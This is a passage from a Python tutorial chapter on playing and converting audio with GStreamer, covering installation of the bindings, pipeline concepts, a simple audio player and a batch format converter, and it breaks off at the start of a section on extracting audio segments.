simplest and perhaps the most efficient way of cutting a small piece from an audio track. It makes use of an excellent GStreamer plugin, called Gnonlin. The Gnonlin plugin The multimedia editing can be classified as linear or non-linear. Non-linear multimedia editing enables control over the media progress in an interactive way. For example, it allows you to control the order in which the sources should be executed. At the same time it allows modifications to the position in a media track. While doing all this, note that the original source (such as an audio file) remains unchanged. Thus the editing is non-destructive. The Gnonlin or (G-Non-Linear) provides essential elements for non-linear editing of a multimedia. It has five major elements, namely, gnlfilesource, gnlurisource, gnlcomposition, gnloperation, and gnlsource. To know more about their properties, run gst-inspect-0.10 command on each of these elements. Here, we will only focus on the element gnlfilesource and a few of its properties. This is really a GStreamer bin element. Like decodebin, it determines which pads to use at the runtime. As the name suggests, it deals with the input media file. All you need to specify is the input media source it needs to handle. The media file format can be any of the supported media formats. The gnlfilesource defines a number of properties. To extract a chunk of an audio, we just need to consider three of them: - media-start: The position in the input media file, which will become the start position of the extracted media. This is specified in nanoseconds. - media-duration: Total duration of the extracted media file (beginning from media-start). This is specified in nanoseconds as well. - uri: The full path of the input media file. 
For example, if it is a file on your local hard drive, the uri will be something like. If the file is located on a website, then the uri will something of this sort:. The gnlfilesource internally does operations like loading and decoding the file, seeking the track to the specified position, and so on. This makes our job easier. We just need to create basic elements that will process the information furnished by gnlfilesource, to create an output audio file. Now that we know the basics of gnlfilesource, let's try to come up with a GStreamer pipeline that will cut a portion of an input audio file. - First the gnlfilesource element that does the crucial job of loading, decoding the file, seeking the correct start position, and finally presenting us with an audio data that represents the portion of track to be extracted. - An audioconvert element that will convert this data into an appropriate audio format. - An encoder that encodes this data further into the final audio format we want. - A sink where the output data is dumped. This specifies the output audio file. Try running the following from the command prompt by replacing the uri and location paths with appropriate file paths on your computer. $gst-launch-0.10.exe gnlfilesource uri= media-start=0 media-duration=15000000000 ! audioconvert ! lame ! filesink location=C:/my_chunk.mp3 This should create an extracted audio file of duration 15 seconds, starting at the initial position on the original file. Note that the media-start and media-duration properties take the input in nanoseconds. This is really the essence of what we will do next. Time for action – MP3 cutter! In this section we will develop a utility that will cut out a portion of an MP3 formatted audio and save it as a separate file. - Keep the file AudioCutter.py handy. You can download it from the Packt website. Here we will only discuss important methods. The methods not discussed here are similar to the ones from earlier examples. Review the file AudioCutter.py which has all the necessary source code to run this application. - Start the usual way. Do the necessary imports and write the following skeleton code. import os, sys, time import thread import gobject import pygst pygst.require("0.10") import gst class AudioCutter: def __init__(self): pass def constructPipeline(self): pass def gnonlin_pad_added(self, gnonlin_elem, pad): pass def connectSignals(self): pass def run(self): pass def printFinalStatus(self): pass def message_handler(self, bus, message): pass #Run the program audioCutter = AudioCutter() thread.start_new_thread(audioCutter.run, ()) gobject.threads_init() evt_loop = gobject.MainLoop() evt_loop.run() The overall code layout looks familiar doesn't it? The code is very similar to the code we developed earlier in this article. The key here is the appropriate choice of the file source element and linking it with the rest of the pipeline! The last few lines of code create a thread with method AudioCutter.run and run the main event loop as seen before. - Now fill in the constructor of the class. We will keep it simple this time. The things we need will be hardcoded within the constructor of the class AudioCutter. It is very easy to implement a processArgs() method as done on many occasions before. Replace the input and output file locations in the code snippet with a proper audio file path on your computer. def __init__(self): self.is_playing = False # Flag used for printing purpose only. 
self.error_msg = '' self.media_start_time = 100 self.media_duration = 30 self.inFileLocation = "C:\AudioFiles\my_music.mp3" self.outFileLocation = "C:\AudioFiles\my_music_chunk.mp3" self.constructPipeline() self.connectSignals() - The self.media_start_time is the new starting position of the mp3 file in seconds. This is the new start position for the extracted output audio. The self.duration variable stores the total duration extracted track. Thus, if you have an audio file with a total duration of 5 minutes, the extracted audio will have a starting position corresponding to 1 min, 40 seconds on the original track. The total duration of this output file will be 30 seconds, that is, the end time will correspond to 2 minutes, 10 seconds on the original track. The last two lines of this method build a pipeline and connect signals with class methods. - Next, build the GStreamer pipeline. 1 def constructPipeline(self): 2 self.pipeline = gst.Pipeline() 3 self.filesrc = gst.element_factory_make( 4 "gnlfilesource") 5 6 # Set properties of filesrc element 7 # Note: the gnlfilesource signal will be connected 8 # in self.connectSignals() 9 self.filesrc.set_property("uri", 10 "" + self.inFileLocation) 11 self.filesrc.set_property("media-start", 12 self.media_start_time*gst.SECOND) 13 self.filesrc.set_property("media-duration", 14 self.media_duration*gst.SECOND) 15 16 self.audioconvert = \ 17 gst.element_factory_make("audioconvert") 18 19 self.encoder = \ 20 gst.element_factory_make("lame", "mp3_encoder") 21 22 self.filesink = \ 23 gst.element_factory_make("filesink") 24 25 self.filesink.set_property("location", 26 self.outFileLocation) 27 28 #Add elements to the pipeline 29 self.pipeline.add(self.filesrc, self.audioconvert, 30 self.encoder, self.filesink) 31 # Link elements 32 gst.element_link_many(self.audioconvert,self.encoder, 33 self.filesink) The highlighted line of code (line 3) creates the gnlfilesource. We call this as self.filesrc. As discussed earlier, this is responsible for loading and decoding audio data and presenting only the required portion of audio data that we need. It enables a higher level of abstraction in the main pipeline. - The code between lines 9 to 13 sets three properties of gnlfilesource, uri, media-start and media-duration. The media-start and media-duration are specified in nanoseconds. Therefore, we multiply the parameter value (which is in seconds) by gst.SECOND which takes care of the units. - The rest of the code looks very much similar to the Audio Converter example. In this case, we only support saving the file in mp3 audio format. The encoder element is defined on line 19. self.filesink determines where the output file will be saved. Elements are added to the pipeline by self.pipeline.add call and are linked together on line 32. Note that the gnlfilesource element, self.filesrc, is not linked with self.audioconvert while constructing the pipeline. Like the decodebin, the gnlfilesource implements dynamic pads. Thus, the pad is not available when the pipeline is constructed. It is created at the runtime depending on the specified input audio format. The "pad_added" signal of gnlfilesource is connected with a method self.gnonlin_pad_added. - Now write the connectSignals and gnonlin_pad_added methods. def connectSignals(self): # capture the messages put on the bus. bus = self.pipeline.get_bus() bus.add_signal_watch() bus.connect("message", self.message_handler) # gnlsource plugin uses dynamic pads. # Capture the pad_added signal. 
self.filesrc.connect("pad-added",self.gnonlin_pad_added) def gnonlin_pad_added(self, gnonlin_elem, pad): pad.get_caps() compatible_pad = \ self.audioconvert.get_compatible_pad(pad, caps) pad.link(compatible_pad) The highlighted line of code in method connectSignals connects the pad_added signal of gnlfilesource with a method gnonlin_pad_added. The gnonlin_pad_added method is identical to the decodebin_pad_added method of class AudioConverter developed earlier. Whenever gnlfilesource creates a pad at the runtime, this method gets called and here, we manually link the pads of gnlfilesource with the compatible pad on self.audioconvert. - The rest of the code is very much similar to the code developed in the Playing an audio section. For example, AudioCutter.run method is equivalent to AudioPlayer.play and so on. You can review the code for remaining methods from the file AudioCutter.py. - Once everything is in place, run the program from the command line as: $python AudioCutter.py - This should create a new MP3 file which is just a specific portion of the original audio file. What just happened? We accomplished creation of a utility that can cut a piece out of an MP3 audio file (yet keep the original file unchanged). This audio piece was saved as a separate MP3 file. We learned about a very useful plugin, called Gnonlin, intended for non-linear multimedia editing. A few fundamental properties of gnlfilesource element in this plugin to extract an audio file. Have a go hero – extend MP3 cutter - Modify this program so that the parameters such as media_start_time can be passed as an argument to the program. You will need a method like processArguments(). You can use either getopt or OptionParser module to parse the arguments. - Add support for other file formats. For example, extend this code so that it can extract a piece from a wav formatted audio and save it as an MP3 audio file. The input part will be handled by gnlfilesource. Depending upon the type of output file format, you will need a specific encoder and possibly an audio muxer element. Then add and link these elements in the main GStreamer pipeline. Recording After learning how to cut out a piece from our favorite music tracks, the next exciting thing we will have is a 'home grown' audio recorder. Then use it the way you like to record music, mimicry or just a simple speech! Remember what pipeline we used to play an audio? The elements in the pipeline to play an audio were filesrc ! decodebin ! audioconvert ! autoaudiosink. The autoaudiosink did the job of automatically detecting the output audio device on your computer. For recording purposes, the audio source is going to be from the microphone connected to your computer. Thus, there won't be any filesrc element. We will instead replace with a GStreamer plugin that automatically detects the input audio device. On similar lines, you probably want to save the recording to a file. So, the autoaudiosink element gets replaced with a filesink element. autoaudiosrc is an element we can possibly use for detecting input audio source. However, while testing this program on Windows XP, the autoaudiosrc was unable to detect the audio source for unknown reasons. So, we will use the Directshow audio capture source plugin called dshowaudiosrc, to accomplish the recording task. Run the gst-inspect-0.10 dshowaudiosrc command to make sure it is installed and to learn various properties of this element. Putting this plugin in the pipeline worked fine on Windows XP. 
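- If you want the same recorder to run outside Windows, one option is to choose the capture element based on the platform instead of hard-coding dshowaudiosrc. The helper below is only a sketch under that assumption (it is not part of RecordingAudio.py); alsasrc is the usual ALSA capture source on Linux, and autoaudiosrc is kept as a generic fallback.

import sys
import pygst
pygst.require("0.10")
import gst

def make_audio_source():
    # Hypothetical helper: pick a capture element per platform.
    # dshowaudiosrc only exists in the Windows GStreamer build.
    if sys.platform == "win32":
        return gst.element_factory_make("dshowaudiosrc")
    if sys.platform.startswith("linux"):
        return gst.element_factory_make("alsasrc")
    # Fall back to automatic detection elsewhere.
    return gst.element_factory_make("autoaudiosrc")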
The dshowaudiosrc is linked to the audioconvert. With this information, let's give it a try using the command-line version of GStreamer. Make sure you have a microphone connected or built into your computer. For a change, we will save the output file in ogg format. gst-launch-0.10.exe dshowaudiosrc num-buffers=1000 ! audioconvert ! audioresample ! vorbisenc ! oggmux ! filesink location=C:/my_voice.ogg The audioresample re-samples the raw audio data with different sample rates. Then the encoder element encodes it. The multiplexer or mux, if present, takes the encoded data and puts it into a single channel. The recorded audio file is written to the location specified by the filesink element. Time for action – recording Okay, time to write some code that does audio recording for us. - Download the file RecordingAudio.py and review the code. You will notice that the only important task is to set up a proper pipeline for audio recording. Content-wise, the other code is very much similar to what we learned earlier in the article. It will have some minor differences such as method names and print statements. In this section we will discuss only the important methods in the class AudioRecorder. - Write the constructor. def __init__(self): self.is_playing = False self.num_buffers = -1 self.error_message = "" self.processArgs() self.constructPipeline() self.connectSignals() - This is similar to the AudioPlayer.__init__() except that we have added a call to processArgs() and initialized the error reporting variable self.error_message and the variable that indicates the total duration of the recording. - Build the GStreamer pipeline by writing constructPipeline method. 1 def constructPipeline(self): 2 # Create the pipeline instance 3 self.recorder = gst.Pipeline() 4 5 # Define pipeline elements 6 self.audiosrc = \ 7 gst.element_factory_make("dshowaudiosrc") 8 9 self.audiosrc.set_property("num-buffers", 10 self.num_buffers) 11 12 self.audioconvert = \ 13 gst.element_factory_make("audioconvert") 14 15 self.audioresample = \ 16 gst.element_factory_make("audioresample") 17 18 self.encoder = \ 19 gst.element_factory_make("lame") 20 21 self.filesink = \ 22 gst.element_factory_make("filesink") 23 24 self.filesink.set_property("location", 25 self.outFileLocation) 26 27 # Add elements to the pipeline 28 self.recorder.add(self.audiosrc, self.audioconvert, 29 self.audioresample, 30 self.encoder, self.filesink) 31 32 # Link elements in the pipeline. 33 gst.element_link_many(self.audiosrc,self.audioconvert, 34 self.audioresample, 35 self.encoder,self.filesink) - We use the dshowaudiosrc (Directshow audiosrc) plugin as an audio source element. It finds out the input audio source which will be, for instance, the audio input from a microphone. - On line 9, we set the number of buffers property to the one specified by self.num_buffers. This has a default value as -1 , indicating that there is no limit on the number of buffers. If you specify this value as 500 for instance, it will output 500 buffers (5 second duration) before sending a End of Stream message to end the run of the program. - On line 15, an instance of element 'audioresample' is created. This element is takes the raw audio buffer from the self.audioconvert and re-samples it to different sample rates. The encoder element then encodes the audio data into a suitable format and the recorder file is written to the location specified by self.filesink. - The code between lines 28 to 35 adds various elements to the pipeline and links them together. 
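- The constructor above also calls self.processArgs(), which is not listed in this excerpt. A rough sketch of what such a method could look like, using the getopt module, is shown below; the actual implementation ships in RecordingAudio.py and may differ in detail.

import getopt, sys

def processArgs(self):
    # Sketch only: parse --num_buffers and --out_file from the command line.
    opts, remainder = getopt.getopt(sys.argv[1:], "",
                                    ["num_buffers=", "out_file="])
    for opt, val in opts:
        if opt == "--num_buffers":
            self.num_buffers = int(val)
        elif opt == "--out_file":
            self.outFileLocation = val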
- Review the code in the file RecordingAudio.py to add the rest of the code. Then run the program to record your voice or anything else that makes an audible sound! The following is a sample command line; this run records audio for 5 seconds. $python RecordingAudio.py --num_buffers=500 --out_file=C:/my_voice.mp3 What just happened? We learned how to record audio using Python and GStreamer. We developed a simple audio recording utility to accomplish this task. The GStreamer plugin, dshowaudiosrc, captured the audio input for us. We created the main GStreamer pipeline by adding this and other elements and used it for the Audio Recorder program. Summary This article gave us deeper insight into the fundamentals of audio processing using Python and the GStreamer multimedia framework. We used several important components of GStreamer to develop some frequently needed audio processing utilities. The main learning points of the article can be summarized as follows: - GStreamer installation: We learned how to install GStreamer and the dependent packages on various platforms. This set the stage for learning audio processing techniques and will also be useful for the next chapters on audio/video processing. - A primer on GStreamer: A quick primer on GStreamer helped us understand the important elements required for media processing. - Use of the GStreamer API to develop audio tools: We learned how to use the GStreamer API for general audio processing. This helped us develop tools such as an audio player, a file format converter, an MP3 cutter, and an audio recorder.
http://www.packtpub.com/article/python-multimedia-working-with-audios
CC-MAIN-2014-10
en
refinedweb
Given below is the sample code: 1 public class A { 2 static void test() throws Error { 3 if (true) throw new AssertionError(); 4 System.out.print("test "); 5 } 6 public static void main(String[] args) { 7 try { test(); } 8 catch (Exception ex) { System.out.print("exception "); } 9 System.out.print("end "); 10 } 11 } How can we correct the above code? 1. No correction is needed 2. By changing the "Exception" class to "Error" in the catch clause at line 8 3. By changing "throws Error" to "throws Exception" at line 2 4. By throwing an exception in place of an error at line 2 The answer is (2). As written, the code terminates with an uncaught AssertionError. AssertionError is a subclass of Error, not of Exception, so the catch clause must name Error (or AssertionError itself) to handle it.
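To make option 2 concrete, the corrected program would look like the following sketch (only the catch clause changes; with it, the output becomes "exception end "):

public class A {
    static void test() throws Error {
        if (true) throw new AssertionError();
        System.out.print("test ");
    }
    public static void main(String[] args) {
        try { test(); }
        catch (Error ex) { System.out.print("exception "); } // catch Error, not Exception
        System.out.print("end ");
    }
}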
http://www.roseindia.net/tutorial/java/scjp/part6/question17.html
CC-MAIN-2014-10
en
refinedweb
On 05/11/2010 02:03 AM, Andrew Morton wrote:> On Sun, 09 May 2010 13:16:38 +0300> Boaz Harrosh <[email protected]> wrote:> >> On 05/07/2010 12:05 PM, Dan Carpenter wrote:>>> For kmap_atomic() we call kunmap_atomic() on the returned pointer.>>> That's different from kmap() and kunmap() and so it's easy to get them>>> backwards.>>>>>> Signed-off-by: Dan Carpenter <[email protected]>>>>>>>> Thank you Dan, I'll push it ASAP. > >> Looks like a bad bug. So this is actually a leak, right? kunmap_atomic>> would detect the bad pointer and do nothing?> > void kunmap_atomic(void *kvaddr, enum km_type type)> {> unsigned long vaddr = (unsigned long) kvaddr & PAGE_MASK;> enum fixed_addresses idx = type + KM_TYPE_NR*smp_processor_id();> > /*> * Force other mappings to Oops if they'll try to access this pte> * without first remap it. Keeping stale mappings around is a bad idea> * also, in case the page changes cacheability attributes or becomes> * a protected page in a hypervisor.> */> if (vaddr == __fix_to_virt(FIX_KMAP_BEGIN+idx))> kpte_clear_flush(kmap_pte-idx, vaddr);> else {> #ifdef CONFIG_DEBUG_HIGHMEM> BUG_ON(vaddr < PAGE_OFFSET);> BUG_ON(vaddr >= (unsigned long)high_memory);> #endif> }> > pagefault_enable();> }> > if CONFIG_DEBUG_HIGHMEM=y, kunmap_atomic() will go BUG.> > if CONFIG_DEBUG_HIGHMEM=n, kunmap_atomic() will do nothing, leaving the> pte pointing at the old page. Next time someone tries to use that> kmap_atomic() slot,> > void *kmap_atomic_prot(struct page *page, enum km_type type, pgprot_t prot)> {> enum fixed_addresses idx;> unsigned long vaddr;> > /* even !CONFIG_PREEMPT needs this, for in_atomic in do_page_fault */> pagefault_disable();> > if (!PageHighMem(page))> return page_address(page);> > debug_kmap_atomic(type);> > idx = type + KM_TYPE_NR*smp_processor_id();> vaddr = __fix_to_virt(FIX_KMAP_BEGIN + idx);> BUG_ON(!pte_none(*(kmap_pte-idx)));> set_pte(kmap_pte-idx, mk_pte(page, prot));> > return (void *)vaddr;> }> > kmap_atomic_prot() will go BUG because the pte wasn't cleared.> > > I can only assume that this code has never been run on i386. I'd suggest> adding a "Cc: <[email protected]>" to the changelog if you have> expectations that anyone will try to run it on i386.> Right! Everyone I know runs 64bit. I will add the Cc: <[email protected]>to the patch. Thanks.Boaz
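For readers who have not hit this class of bug before, the mix-up being discussed is passing the wrong thing to kunmap_atomic(). A minimal sketch of the correct pairing, written against the pre-2.6.37 API with explicit km_type slots that this thread is about (illustrative only, not code from the patch itself):

#include <linux/highmem.h>
#include <linux/string.h>

static void copy_from_page(struct page *page, void *dst, size_t len)
{
	/* Map the page and remember the returned kernel virtual address. */
	void *kvaddr = kmap_atomic(page, KM_USER0);

	memcpy(dst, kvaddr, len);

	/*
	 * Unmap with the address returned by kmap_atomic(), not with
	 * 'page'. Getting this backwards BUGs with CONFIG_DEBUG_HIGHMEM=y
	 * and silently leaves a stale fixmap pte with it disabled, which
	 * is exactly the failure mode described above.
	 */
	kunmap_atomic(kvaddr, KM_USER0);
}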
http://lkml.org/lkml/2010/5/11/391
CC-MAIN-2014-10
en
refinedweb
YARD: Yay! A Ruby Documentation Tool IRC: irc.freenode.net / #yard Git: Author: Loren Segal Contributors: License: MIT License Latest Version: 0.8.7.3 Release Date: November 1st 2013 Synopsis. Feature List 1. RDoc/SimpleMarkup Formatting Compatibility: YARD is made to be compatible with RDoc formatting. In fact, YARD does no processing on RDoc documentation strings, and leaves this up to the output generation tool to decide how to render the documentation. 2. Yardoc Meta-tag Formatting Like Python, Java, Objective-C and other languages: YARD uses a '@tag' style definition syntax for meta tags alongside regular code documentation. These tags should be able to happily sit side by side RDoc formatted documentation, but provide a much more consistent and usable way to describe important information about objects, such as what parameters they take and what types they are expected to be, what type a method should return, what exceptions it can raise, if it is deprecated, etc.. It also allows information to be better (and more consistently) organized during the output generation phase. You can find a list of tags in the Tags.md file. YARD also supports an optional "types" declarations for certain tags. This allows the developer to document type signatures for ruby methods and parameters in a non intrusive but helpful and consistent manner. Instead of describing this data in the body of the description, a developer may formally declare the parameter or return type(s) in a single line. Consider the following method documented with YARD formatting: # Reverses the contents of a String or IO object. # # @param [String, #read] contents the contents to reverse # @return [String] the contents reversed lexically def reverse(contents) contents = contents.read if contents.respond_to? :read contents.reverse end With the above @param tag, we learn that the contents parameter can either be a String or any object that responds to the 'read' method, which is more powerful than the textual description, which says it should be an IO object. This also informs the developer that they should expect to receive a String object returned by the method, and although this may be obvious for a 'reverse' method, it becomes very useful when the method name may not be as descriptive. 3. Custom Constructs and Extensibility of YARD: YARD is designed to be extended and customized by plugins. Take for instance the scenario where you need to document the following code: class List # Sets the publisher name for the list. cattr_accessor :publisher end This custom declaration provides dynamically generated code that is hard for a documentation tool to properly document without help from the developer. To ease the pains of manually documenting the procedure, YARD can be extended by the developer to handle the cattr_accessor construct and automatically create an attribute on the class with the associated documentation. This makes documenting external API's, especially dynamic ones, a lot more consistent for consumption by the users. YARD is also designed for extensibility everywhere else, allowing you to add support for new programming languages, new data structures and even where/how data is stored. 4. Raw Data Output: YARD also outputs documented objects as raw data (the dumped Namespace) which can be reloaded to do generation at a later date, or even auditing on code. This means that any developer can use the raw data to perform output generation for any custom format, such as YAML, for instance. 
While YARD plans to support XHTML style documentation output as well as command line (text based) and possibly XML, this may still be useful for those who would like to reap the benefits of YARD's processing in other forms, such as throwing all the documentation into a database. Another useful way of exploiting this raw data format would be to write tools that can auto generate test cases, for example, or show possible unhandled exceptions in code. 5. Local Documentation Server: YARD can serve documentation for projects or installed gems (similar to gem server) with the added benefit of dynamic searching, as well as live reloading. Using the live reload feature, you can document your code and immediately preview the results by refreshing the page; YARD will do all the work in re-generating the HTML. This makes writing documentation a much faster process. Installing To install YARD, use the following command: $ gem install yard (Add sudo if you're installing under a POSIX system as root) Alternatively, if you've checked the source out directly, you can call rake install from the root project directory. Important Note for Debian/Ubuntu users: there's a possible chance your Ruby install lacks RDoc, which is occasionally used by YARD to convert markup to HTML. If running which rdoc turns up empty, install RDoc by issuing: $ sudo apt-get install rdoc Usage There are a couple of ways to use YARD. The first is via command-line, and the second is the Rake task. 1. yard Command-line Tool YARD comes packaged with a executable named yard which can control the many functions of YARD, including generating documentation, graphs running the YARD server, and so on. To view a list of available YARD commands, type: $ yard --help Plugins can also add commands to the yard executable to provide extra functionality. Generating Documentation The yardoc executable is a shortcut for yard doc. The most common command you will probably use is yard doc, or yardoc. You can type yardoc --help to see the options that YARD provides, but the easiest way to generate docs for your code is to simply type yardoc in your project root. This will assume your files are located in the lib/ directory. If they are located elsewhere, you can specify paths and globs from the commandline via: $ yardoc 'lib/**/*.rb' 'app/**/*.rb' ...etc... The tool will generate a .yardoc file which will store the cached database of your source code and documentation. If you want to re-generate your docs with another template you can simply use the --use-cache (or -c) option to speed up the generation process by skipping source parsing. YARD will by default only document code in your public visibility. You can document your protected and private code by adding --protected or --private to the option switches. In addition, you can add --no-private to also ignore any object that has the @private meta-tag. This is similar to RDoc's ":nodoc:" behaviour, though the distinction is important. RDoc implies that the object with :nodoc: would not be documented, whereas YARD still recommends documenting private objects for the private API (for maintainer/developer consumption). You can also add extra informative files (README, LICENSE) by separating the globs and the filenames with '-'. $ yardoc 'app/**/*.rb' - README LICENSE FAQ If no globs precede the '-' argument, the default glob ( lib/**/*.rb) is used: $ yardoc - README LICENSE FAQ Note that the README file can be specified with its own --readme switch. 
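For instance, the two ideas above can be combined on a single command line (file names here are purely illustrative):

$ yardoc --readme README.md 'lib/**/*.rb' - LICENSE FAQ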
You can also add a .yardopts file to your project directory which lists the switches separated by whitespace (newlines or space) to pass to yardoc whenever it is run. A full overview of the .yardopts file can be found in YARD::CLI::Yardoc. Queries The yardoc tool also supports a --query argument to only include objects that match a certain data or meta-data query. The query syntax is Ruby, though a few shortcuts are available. For instance, to document only objects that have an "@api" tag with the value "public", all of the following syntaxes would give the same result: --query '@api.text == "public"' --query 'object.has_tag?(:api) && object.tag(:api).text == "public"' --query 'has_tag?(:api) && tag(:api).text == "public"' Note that the "@tag" syntax returns the first tag named "tag" on the object. To return the array of all tags named "tag", use "@@tag". Multiple --query arguments are allowed in the command line parameters. The following two lines both check for the existence of a return and param tag: --query '@return' --query '@param' --query '@return && @param' For more information about the query syntax, see the YARD::Verifier class. 2. Rake Task The second most obvious is to generate docs via a Rake task. You can do this by adding the following to your Rakefile: YARD::Rake::YardocTask.new do |t| t.files = ['lib/**/*.rb', OTHER_PATHS] # optional t. = ['--any', '--extra', '--opts'] # optional end both the files and options settings are optional. files will default to lib/**/*.rb and options will represents any options you might want to add. Again, a full list of options is available by typing yardoc --help in a shell. You can also override the options at the Rake command-line with the OPTS environment variable: $ rake yard OPTS='--any --extra --opts' 3. yri RI Implementation The yri binary will use the cached .yardoc database to give you quick ri-style access to your documentation. It's way faster than ri but currently does not work with the stdlib or core Ruby libraries, only the active project. Example: $ yri YARD::Handlers::Base#register $ yri File.relative_path Note that class methods must not be referred to with the "::" namespace separator. Only modules, classes and constants should use "::". You can also do lookups on any installed gems. Just make sure to build the .yardoc databases for installed gems with: $ sudo yard gems If you don't have sudo access, it will write these files to your ~/.yard directory. yri will also cache lookups there. 4. yard server Documentation Server The yard server command serves documentation for a local project or all installed RubyGems. To serve documentation for a project you are working on, simply run: $ yard server And the project inside the current directory will be parsed (if the source has not yet been scanned by YARD) and served at. Live Reloading If you want to serve documentation on a project while you document it so that you can preview the results, simply pass --reload ( -r) to the above command and YARD will reload any changed files on each request. This will allow you to change any documentation in the source and refresh to see the new contents. Serving Gems To serve documentation for all installed gems, call: $ yard server --gems This will also automatically build documentation for any gems that have not been previously scanned. Note that in this case there will be a slight delay between the first request of a newly parsed gem. 5. yard graph Graphviz Generator You can use yard graph to generate dot graphs of your code. 
This, of course, requires Graphviz and the dot binary. By default this will generate a graph of the classes and modules in the best UML2 notation that Graphviz can support, but without any methods listed. With the --full option, methods and attributes will be listed. There is also a --dependencies option to show mixin inclusions. You can output to stdout or a file, or pipe directly to dot. The same public, protected and private visibility rules apply to yard graph. More options can be seen by typing yard graph --help, but here is an example: $ yard graph --protected --full --dependencies Changelog November.1.13: 0.8.7.3 release
https://www.rubydoc.info/gems/yard/0.8.7.4/frames
CC-MAIN-2018-22
en
refinedweb
I've been puzzled by the concept of how Java and C# handles namespaces. Firstly, examples of namespace pollution in some programming languages: using namespace std import math.* Math.functionname @Override using XElement using System; using System.Collections.Generic; using System.Linq; using System.Text; //the ones above are auto-generated by Visual Studio, too using System.Xml.Linq; System.Xml.Linq.XElement std::cout import java.util.linkedlist import java.util.* As already pointed out by others, the problem of namespace pollution is not as prominent in Java as it is in C++. The main reason why namespace pollution is a problem in C++ (and thus called "pollution" in the first place) is that it may cause errors in other modules. This is explained in more detail in Why is “using namespace std;” considered bad practice?. (The concerning thing here is that this may not only refer to compile errors: For compile errors, you are forced to do something and to resolve ambiguities. The really concerning thing is that it may cause the code to still compile properly, but afterwards simply call the wrong functions!) In Java, each import affects only the file in which it is contained. This means that the above mentioned pollution can still occur locally in one file. (One could say: It's only the problem of the author who actually caused the namespace pollution, which is just fair) Analogously to the case in the above mentioned link: Imagine you are using two libraries, "foo" and "bar". And out of laziness (or lack of knowledge of best practices), you are using the wildcard imports: import foo.*: import bar.*: class MyClass { void someMethod() { // Assume that this class is from the "foo" librariy, and the // fully qualified name of this class is "foo.Example" Example e = new Example(); } } Now imagine you upgrade your version of the "bar" library. And the new version contains a class called bar.Example. Then the above code will fail to compile, because the reference to the class Example is ambiguous. The same problem can, by the way, also appear with static imports. It's a bit more delicate and subtle, and collisions are a bit more likely. That's why they say that you should use static imports very sparingly. A side note: Of course, these collisions and ambiguities can easily be resolved. You can always use the fully qualified names instead. Most modern Java IDEs offer a functionality to organize/optimize the imports. For example, in Eclipse, you can always press CTRL+Shift+O, which will (depending on the settings in Preferences->Java->Code Style->Organize Imports) replace all wildcard imports with the individual ones.
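To make the resolution concrete: either qualify the ambiguous name at the point of use, or add a single-type import, which in Java always takes precedence over wildcard (on-demand) imports. A small sketch using the same hypothetical foo/bar libraries from above:

import foo.*;
import bar.*;
import foo.Example;   // single-type import wins over both wildcards

class MyClass {
    void someMethod() {
        Example e1 = new Example();         // now unambiguously foo.Example
        bar.Example e2 = new bar.Example(); // or fully qualify where needed
    }
}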
https://codedump.io/share/cCwnuUGvKe65/1/does-namespace-pollution-in-java-or-c-exist-like-in-c
CC-MAIN-2018-22
en
refinedweb
I have been following the ember quick start guide to create an app that displays some data () but instead of displaying just a javascript array with scientists names, I want to display the products from the following json. I have placed the json file in the public folder. It looks like: { "products": [ { "_id": "58ff60ffcd082f040072305a", "slug": "apple-tree-printed-linen-butterfly-bow-tie", "name": "Apple Tree Printed Linen Butterfly Bow Tie ", "description": "This fun 40 Colori Apple Tree Printed Linen Butterfly Bow Tie features a design of various apple trees built from tiny polka dots. The back of this bow tie features a polka dot print in complementing colours which when the bow tie is tied will pop out from behind making for a subtle yet unique detail. The playful design, stand out natural linen texture, and colourful combinations make this bow tie a perfect accessory for any outfit!\n", "standard_manufacturer": "58cbafc55491430300c422ff", "details": "Size: Untied (self-tie) bow tie with an easily adjustable neck strap from 13-3/4'' to 19'' (35 to 48 cm)\nHeight: 6 cm\nMaterial: Printed 100% linen\nCare: Dry clean\nMade in Italy", "sizes": [ { "value": "Violet", "size": "57722c80c8595b0300a11e61", "_id": "58ff60ffcd082f0400723070", "marked_as_oos_at": null, "quantity": -1, "stock": true, "id": "58ff60ffcd082f0400723070" }, and so on. My code for the model of the route for displaying the list is as follows import Ember from 'ember'; export default Ember.Route.extend({ model() { //return ['Marie Curie', 'Mae Jemison', 'Albert Hofmann']; return Ember.$.getJSON("/products.json"); } }); I have followed the tutorial exactly except for the return Ember.$.getJSON("/products.json"); line in scientists.js. My data is not being displayed and the error i get in the ember inspector is compiled.js:2 Uncaught TypeError: Failed to execute 'getComputedStyle' on 'Window': parameter 1 is not of type 'Element'. at E (compiled.js:2) at Object.u (compiled.js:25) at compiled.js:25 E @ compiled.js:2 u @ compiled.js:25 (anonymous) @ compiled.js:25 I am very new with ember and fairly new with js. Any help appreciated! Thanks!
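For what it is worth, one detail that stands out is that the model hook resolves to the whole JSON object, while a template written against the quick start guide usually iterates over an array. A possible adjustment (untested, and assuming the template loops over the model directly) is to resolve to the products array instead:

import Ember from 'ember';

export default Ember.Route.extend({
  model() {
    // Resolve to the array itself so an {{#each}} over the model has
    // something iterable to work with.
    return Ember.$.getJSON("/products.json").then(function(data) {
      return data.products;
    });
  }
});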
https://discuss.emberjs.com/t/ember-app-cannot-load-json-data-from-local-file/13254
CC-MAIN-2018-34
en
refinedweb
Publish content on Docker StoreEstimated reading time: 15 minutes Permitted content and support options Content that runs on a Docker Enterprise Edition (Docker Certified Infrastructure) may be published in the Store. This content may also qualify to become a Docker Certified Container or Plugin image and be backed by collaborative Docker/Publisher support Content that runs on the Docker Community Edition may be published in the Store, but is not supported by Docker nor is it eligible for certification. Content that requires a non Certified Infrastructure environment may not be published in the Store. Onboarding The Docker Store publishing process begins from the landing page: sign in with your Docker ID and specify a product name and image source from a private repository. Your product images must be stored in private repositories of Docker Cloud and/or Hub as they serve as an internal staging area from which you can revise and submit content for review. After specifying a source, provide the content-manifest items to populate your product details page. These items include logos, descriptions, and licensing and support links so that customers can make informed decisions about your image. These items are submitted alongside the image itself for moderation. The Docker Store team then conducts a comprehensive review of your image and metadata. We use Docker Security Scanning to evaluate the security of your product images, and share results with you as the publisher. During the image-moderation phase, we iterate back and forth with publishers to address outstanding vulnerabilities and content-manifest issues until the image is ready for publication. Commercial content and other supported images may qualify for the Docker Certified Container or Plugins quality mark. The testing for this program goes beyond the vulnerability scan and also evaluates container images for Docker best practices developed over years of experience. Collaborative support capability between Docker and the publisher is also established. Refer to the diagram below for a high-level summary: Create great content Create your content, and follow our best practices to Dockerize it. Keep your images small, your layers few, and your components secure. Refer to the links and guidelines listed below to build and deliver great content: Best practices for writing Dockerfiles Official repositories on Docker Hub Docker Bench for Security Here are some best practices when it comes to building 